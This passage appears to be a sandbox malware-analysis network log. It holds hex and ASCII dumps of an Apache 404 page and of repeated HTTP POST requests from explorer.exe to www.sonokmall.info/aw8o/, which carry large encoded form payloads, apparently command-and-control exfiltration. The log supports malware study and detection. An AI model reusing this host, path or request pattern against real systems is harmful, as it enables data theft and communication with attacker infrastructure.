51 57 61 57 74 31 51 59 4b 35 64 4d 68 62 51 73 37 51 6c 41 78 2b 76 6f 55 69 4d 73 51 55 69 45 53 56 77 32 4c 73 62 37 6d 74 38 39 66 74 61 79 58 49 74 46 58 35 37 67 54 53 39 30 2b 65 78 48 31 63 55 2b 49 37 6c 73 2f 6f 53 51 56 57 4f 51 2f 73 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=1yaSGvYS1sUIX3FxAalA5Wmb6Bhg+qogKiP1erqNHVzDuALLgF1aBUhsp6vhJRllc+zrY2mUPFYv0uFZzohVMMi+QHWpt69HETxGV51zlkDqc+usnw8BE9YS9Iqkirqh+hzBIufJ1pDGvyk1Cb6ZJ4v1lOGfcfOZvwbSkTYn6jVRLouQlB5wRDolPJfZd7IirAxjztw0tTzSdgQ4MFkGSWyNSCcIkHg30DgPRC1Wk//SE64OOmPSRekGieHQnysmpmERhxi5v8g9ZBdkYzapUKgzDeRx6E7mN+7u++trs8zaXYTLU3dKJDXQU6XHDMCE6ZkXVo8/QlDtsR9XAHBdCG39G2mFVn8PGP5tvZf0TyTQ+ijKv4U3GpWTZSjDF3OV1R76CUG5ZS/ILId7yThMUyC+q/Nn9giic2lyNOOjkXxFqo17U/ekRQWaWt1QYK5dMhbQs7QlAx+voUiMsQUiESVw2Lsb7mt89ftayXItFX57gTS90+exH1cU+I7ls/oSQVWOQ/s=
                                                                                                                                                                                          Aug 10, 2023 10:19:15.042538881 CEST363INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:14 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Content-Length: 38381
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 31 20 32 38 38 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 34 35 2e 38 22 20 63 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="445.8" cy="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx=
                                                                                                                                                                                          Aug 10, 2023 10:19:15.042619944 CEST364INData Raw: 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 30 2e 31 20 32 39 33 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65
                                                                                                                                                                                          Data Ascii: "438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="
                                                                                                                                                                                          Aug 10, 2023 10:19:15.042678118 CEST366INData Raw: 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 37 2e 39 22 20 63 79 3d 22 38 31 30 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65
                                                                                                                                                                                          Data Ascii: ll: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fil
                                                                                                                                                                                          Aug 10, 2023 10:19:15.042735100 CEST367INData Raw: 32 20 33 31 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 31 39 2e 37 22 20 63 79 3d 22 38 31
                                                                                                                                                                                          Data Ascii: 2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3
                                                                                                                                                                                          Aug 10, 2023 10:19:15.042789936 CEST368INData Raw: 37 39 30 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65
                                                                                                                                                                                          Data Ascii: 790.5" r="3.7" transform="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590" cy="782
                                                                                                                                                                                          Aug 10, 2023 10:19:15.042846918 CEST370INData Raw: 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 34 38 22 20 63 79 3d 22 37 34 37 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 39 2e 34 20 33 37 37 2e 35 29 20 72
                                                                                                                                                                                          Data Ascii: <circle cx="648" cy="747.5" r="3.7" transform="translate(-269.4 377.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="643.5" cy="727.1" r="3.7" transform="translate(-260.6 373.2) rotate(-27.1)" style="fill: #ffe029"/>
                                                                                                                                                                                          Aug 10, 2023 10:19:15.042903900 CEST371INData Raw: 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 34 2e 37 22 20 63 79 3d 22 37 36 37 2e 39 22 20 72
                                                                                                                                                                                          Data Ascii: 1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="594.7" cy="767.9" r="3.7" transform="translate(-284.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.7" cy="773.4" r="3.7" transform="translate(-289.3 346.9
                                                                                                                                                                                          Aug 10, 2023 10:19:15.042958975 CEST372INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 37 2e 33 20 33 33 36 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                                                                                                                                                                                          Data Ascii: ="3.7" transform="translate(-247.3 336.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="559.1" cy="669.7" r="3.7" transform="translate(-243.8 328.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="558.2" cy="686.9" r=
                                                                                                                                                                                          Aug 10, 2023 10:19:15.043014050 CEST374INData Raw: 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 35 36 2e 33 22 20 63 79 3d 22 37 30 33 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 39 2e 37 20 33 33 30 2e 39 29
                                                                                                                                                                                          Data Ascii: <circle cx="556.3" cy="703.9" r="3.7" transform="translate(-259.7 330.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="552.7" cy="720.2" r="3.7" transform="translate(-267.5 331.1) rotate(-27.1)" style="fill: #ffe029"/>
                                                                                                                                                                                          Aug 10, 2023 10:19:15.043071032 CEST375INData Raw: 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 31 22 20 63 79 3d 22 37 31 37 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61
                                                                                                                                                                                          Data Ascii: e(-27.1)" style="fill: #ffe029"/> <circle cx="501" cy="717.2" r="3.7" transform="translate(-271.8 307.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.1" cy="704.7" r="3.7" transform="translate(-267.6 299.4) rotate(-
                                                                                                                                                                                          Aug 10, 2023 10:19:15.213785887 CEST376INData Raw: 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 30 2e 32 20 32 39 36 2e 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c
                                                                                                                                                                                          Data Ascii: rm="translate(-240.2 296.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="478.7" cy="654.5" r="3.7" transform="translate(-245.7 290.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="477.7" cy="634.1" r="3.7" transfor


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          9192.168.11.2049724162.0.239.14580C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:17.476996899 CEST405OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.sonokmall.info
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.sonokmall.info
                                                                                                                                                                                          Referer: http://www.sonokmall.info/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 52914
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 31 79 61 53 47 76 59 53 31 73 55 49 58 33 46 78 41 61 6c 41 35 57 6d 62 36 42 68 67 2b 71 6f 67 4b 69 50 31 65 72 71 4e 48 56 37 44 75 79 7a 4c 68 6d 64 61 41 55 68 73 71 36 76 67 4a 52 6c 34 63 2b 72 76 59 32 61 71 50 48 77 76 30 38 74 5a 7a 62 5a 56 48 73 69 2f 63 6e 57 52 6d 61 39 54 45 54 38 63 56 35 78 4a 6c 56 6e 71 64 39 47 73 77 33 6f 43 62 64 59 49 39 49 71 53 6d 72 71 70 2b 67 69 61 49 75 6a 4a 31 74 2f 47 76 41 4d 31 45 49 43 5a 45 49 76 32 71 75 47 63 58 2f 4f 38 76 78 2f 73 6b 54 59 33 36 69 68 52 4c 76 69 51 6b 43 42 2f 53 6a 6f 6c 4d 4a 66 47 57 62 4e 6c 72 45 5a 42 7a 75 73 30 74 54 62 53 62 41 51 34 61 78 51 46 61 57 79 4c 44 53 63 62 7a 58 74 30 30 44 45 78 52 48 31 57 6b 50 72 53 46 4e 55 4f 64 58 50 53 66 65 6b 45 73 2b 48 44 75 53 73 4d 70 6d 55 33 68 31 54 43 76 2b 73 39 59 6b 4a 6b 4b 47 75 71 45 61 67 31 64 75 52 34 74 30 33 55 4e 2b 72 45 2b 2b 73 32 73 39 6e 61 57 72 62 4c 56 32 64 4a 4e 54 58 62 66 61 57 46 4d 73 4f 4f 36 59 4a 61 56 72 38 76 51 6c 33 74 74 78 39 58 52 57 42 65 62 6d 33 2b 4b 57 6d 58 59 48 38 59 47 50 30 4d 76 63 2b 50 54 6d 6a 51 73 69 7a 4b 6c 49 55 30 58 35 57 74 43 69 6a 42 50 58 4f 56 31 52 33 45 43 55 61 35 5a 6a 48 49 4c 36 46 37 6a 6b 56 4d 45 43 43 6b 71 2f 4e 32 39 67 6e 55 63 32 74 74 4e 4e 58 4d 6b 53 42 46 72 39 5a 37 56 4e 36 6e 55 67 57 43 48 39 31 35 58 76 68 30 4d 6c 37 59 73 37 41 54 41 43 71 76 36 67 43 4d 6f 51 55 68 42 79 55 36 6d 62 73 4e 78 47 51 39 39 66 68 6b 79 55 55 39 46 56 35 37 69 6e 7a 32 67 75 61 52 62 32 63 56 34 76 54 4b 79 75 51 41 42 41 61 30 50 50 56 4b 30 39 77 30 6f 37 54 57 2b 6c 70 66 36 61 76 67 75 48 31 77 32 59 56 2f 39 79 44 51 45 71 35 53 6d 34 68 4b 4e 44 49 6e 75 36 6e 71 31 50 4c 68 6f 65 38 2f 66 35 73 4d 62 66 46 71 33 47 6e 50 62 54 34 78 37 79 4a 72 64 44 2f 69 43 64 66 38 76 55 39 4a 73 62 72 74 6c 79 2b 7a 47 55 34 79 68 4b 4f 32 31 6f 67 6a 6c 71 54 4a 70 48 30 41 41 45 6b 52 46 4d 59 55 73 32 69 30 39 6c 32 64 64 79 76 6b 64 34 6a 67 47 68 6f 65 6a 6e 36 2f 43 49 4f 72 53 63 51 34 38 2b 30 55 38 58 53 4e 6b 55 6b 5a 76 44 4b 68 68 48 39 33 31 70 52 4a 72 66 53 6b 73 59 35 6f 31 59 4b 6b 58 2f 69 72 46 52 4e 61 50 6e 37 43 61 7a 74 32 6b 34 76 39 64 4d 46 6a 70 62 4c 50 62 69 68 64 69 43 39 61 7a 43 78 55 76 6e 43 45 70 52 6b 6f 65 50 79 52 34 4a 4b 52 47 5a 79 4c 55 4c 76 6f 5a 37 48 73 30 70 48 33 72 65 57 68 42 2f 44 52 74 51 44 59 79 34 4f 43 4f 61 75 33 4f 49 31 61 55 6c 41 31 52 59 36 6c 59 34 4d 62 35 6b 7a 79 49 39 67 65 2f 4f 36 51 4f 4e 55 73 6b 64 32 6e 36 71 67 48 58 68 4f 67 4c 36 34 42 32 6a 6e 49 63 6e 42 32 4c 4f 67 68 47 6f 77 38 5a 6e 45 6b 70 72 4d 6f 42 2b 41 4f 47 6b 6a 6d 67 61 75 58 4d 43 50 31 61 46 71 46 39 68 33 73 47 31 55 6c 76 6c 30 67 69 4e 72 70 44 57 32 6c 4b 53 64 77 4c 5a 2b 58 78 45 6b 4f 53 36 4e 53 4b 79 39 71 54 4d 51 79 75 6c 42 6c 6d 70 78 66 6a 4f 63 34 41 6a 62 6c 53 68 4e 37 59 66 45 53 77 51 51 56 58 47 51 43 36 58 36 51 69 75 37 66 39 41 6c 33 72 69 4b 58 53 7a 4a 68 66 4e 74 47 57 39 47 6a 58 47 36 34 37 2f 56 4a 76 4c 7a 6f 33 41 58 39 62 76 74 77 54 2f 51 73 41 55 79 70 63 41 38 6a 74 63 39 6a 53 61 61 78 4c 39 38 73 6d 75 55 2b 75 47 37 4d 57 48 49 55 64 66 66 43 77 52 47 38 6a 37 31 2b 61 35 2f 49 74 66 32 42 4b 35 5a 4b 41 51 47 4c 37 63 44 63 42 37 50 50 50 31 69 4a 76 72 77 72 71 71 4d 56 71 73 50 38 48 73 59 47 65 4f 4c 32 56 69 63 4a 75 51 30 46 58 5a 48 31 56 47 74 57 51 77 47 46 68 41 56 68 78 6a 57 77 51 64 7a 33 6e 36 67 65 43 47 72 48 31 6d 79 62 73 4f 41 74 57 58 76 70 76 6e 31 76 67 52 33 41 4a 6a 63 6f 70 57 46 4f 4a 65 65 43 43 36 57 30 76 37 32 47 6c 71 6a 5a 4c 69 6a 34 43 73 2f 4e 74 6e 34 65 33 67 62 36 71 70 36 44 37 62 75 48 76 49 4c 44 31 35 4d 61 71 37 65 39 42 4b 59 69 31 34 36 74 79 38 2b 57 4e 47 62 64 6b 44 58 57 46 4c 6c 4b 6a 6f 54 64 79 51 56 39 46 39 58 47 70 6e 5a 4c 72 74 56 36 39 54 37 66 66 69 44 2b 70 43 61 57 34 59 44 78 75 36 53 71 42 52 70 56 6e 34 37 68 58 42 6d 48 7a 69 78 79 72 56 5a 66 52 32 7a 70 77 4a 45 47 4e 49 43 6f 6f 4a 32 51 4c 42 51 56 32 43 47 32 6b 6c 50 76 58 76 4c 68 69 74 6a 6e 39 66 57 58 6d
                                                                                                                                                                                          Data Ascii: 1NM6e=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
                                                                                                                                                                                          Aug 10, 2023 10:19:17.477018118 CEST410OUTData Raw: 4a 55 74 6b 64 47 39 72 32 35 6a 67 57 42 4a 4e 39 64 64 35 53 7a 7a 7a 75 35 72 53 2f 36 49 56 6e 65 55 45 6c 44 2b 44 4f 78 58 65 62 50 4f 4e 77 36 4f 45 31 6c 72 58 6e 68 36 68 50 39 50 6c 74 68 79 36 2b 64 37 49 4d 74 7a 64 6e 4c 57 53 57 39
                                                                                                                                                                                          Data Ascii: JUtkdG9r25jgWBJN9dd5Szzzu5rS/6IVneUElD+DOxXebPONw6OE1lrXnh6hP9Plthy6+d7IMtzdnLWSW9sKn2RzYJSx2cO3+xfsgHweEsPaYkS21PjU6S6X+tPNgUzgqcJYJetOyhLotWrd855b6KMr2MQwm/KTPBPstEIbC5ylQzYm0UT596fOV/sVWMRZ9ACtCTb5DtUeoFp6ZIwAeMVOgiXSJGNSswNtD8S5KWTimw0/+2b
                                                                                                                                                                                          Aug 10, 2023 10:19:17.477106094 CEST415OUTData Raw: 39 37 51 37 39 4b 2b 74 7a 50 4a 76 71 43 50 58 4d 48 35 49 45 4d 44 6b 56 62 65 6d 66 74 6f 50 67 7a 59 53 47 59 72 4e 45 69 57 38 70 6e 68 55 62 47 4f 67 54 68 44 2b 2f 5a 55 52 4c 6f 6c 5a 54 52 62 30 77 2b 4c 6b 41 51 34 46 65 76 68 39 44 34
                                                                                                                                                                                          Data Ascii: 97Q79K+tzPJvqCPXMH5IEMDkVbemftoPgzYSGYrNEiW8pnhUbGOgThD+/ZURLolZTRb0w+LkAQ4Fevh9D4QEYz3bwvJNS1uQ2YLSU4ae2hvtKRC1fhfzFSRDeviI0oedMsEL1RsYBzkXw7XAb4RgSQDSqTGTn+59BAU51rRxgD41Wax8e2QohbeNLIYZps0I7SaLlgPwIQTppBcRTVUVYnXVMS6FmV27gn533ZyfibZ8H2KBV9O
                                                                                                                                                                                          Aug 10, 2023 10:19:17.646595001 CEST419OUTData Raw: 69 74 4f 66 74 61 65 37 61 57 38 58 77 68 58 37 46 4a 71 67 4e 31 69 61 54 46 49 73 2b 5a 70 52 4f 50 50 48 57 43 44 77 61 36 48 5a 58 76 34 50 49 63 66 63 6d 39 30 58 32 7a 52 6b 42 64 4a 51 68 66 2b 53 71 47 31 71 73 72 67 61 73 73 54 77 62 39
                                                                                                                                                                                          Data Ascii: itOftae7aW8XwhX7FJqgN1iaTFIs+ZpROPPHWCDwa6HZXv4PIcfcm90X2zRkBdJQhf+SqG1qsrgassTwb9rC7+LE+10AwN1zNLCWGpYCW5bJ0+WAZs09caw7rIbm+GrrwIrD0qcFgaRkKLRXh1lpwHorXYL4F2L5mW+SHiqeCTAy8XcQ06lQGEtUrYKf9yZKmhEFMM+0gQRKAjqkKlEBg9CQp34WHw/FeYV2KHrvBNQtbf9EOJ1
                                                                                                                                                                                          Aug 10, 2023 10:19:17.646744013 CEST423OUTData Raw: 6c 39 4a 4e 38 54 74 4e 4f 47 32 63 42 66 4e 71 71 43 57 33 6f 45 2b 76 6d 74 4c 68 4f 2f 64 6d 64 37 70 61 32 79 41 50 52 67 52 42 44 4a 4a 34 68 51 47 56 41 6b 68 2f 49 2f 7a 70 46 5a 58 43 31 41 54 76 77 53 4c 37 5a 37 32 48 73 43 62 68 32 4b
